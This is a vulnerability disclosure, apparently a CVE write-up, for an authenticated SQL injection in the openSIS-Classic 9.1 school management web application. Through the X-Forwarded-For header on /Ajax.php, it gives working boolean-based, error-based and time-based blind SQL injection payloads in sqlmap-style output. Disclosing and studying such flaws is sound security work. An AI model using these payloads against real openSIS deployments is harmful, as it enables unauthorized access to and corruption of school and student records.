CVE-2024-46626 :Authenticated SQL Injection Vulnerability in openSIS-Classic Version 9.1 Web Application
Description:
This vulnerability addresses a critical SQL Injection vulnerability found in the openSIS-Classic Version 9.1 web application. The vulnerability allows any authenticated user to exploit the SQL query by injecting malicious SQL code, potentially leading to unauthorized data access or manipulation.
Vulnerability Details: Type: SQL Injection Impact: This vulnerability allows an attacker with any level of system access to execute arbitrary SQL queries. This can lead to data leakage, data corruption, or full database compromise. Requirements for Exploitation: Attacker must be authenticated to the system but does not need elevated privileges.
Example Payload:
GET /Ajax.php?modname=x HTTP/1.1
Parameter: X-Forwarded-For #1* ((custom) HEADER)
Type: boolean-based blind
Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: 127.0.0.2' AND EXTRACTVALUE(5785,CASE WHEN (5785=5785) THEN 5785 ELSE 0x3A END) AND 'HVwG'='HVwG
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: 127.0.0.2' AND GTID_SUBSET(CONCAT(0x717a787671,(SELECT (ELT(5261=5261,1))),0x71716b6b71),5261) AND 'djze'='djze
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: 127.0.0.2' AND (SELECT 5313 FROM (SELECT(SLEEP(5)))VeyP) AND 'ZIae'='ZIae
References:
https://github.com/d0ub1edd/CVE-Reference/
Discovered by Devrim Dıragumandan in 09/09/2024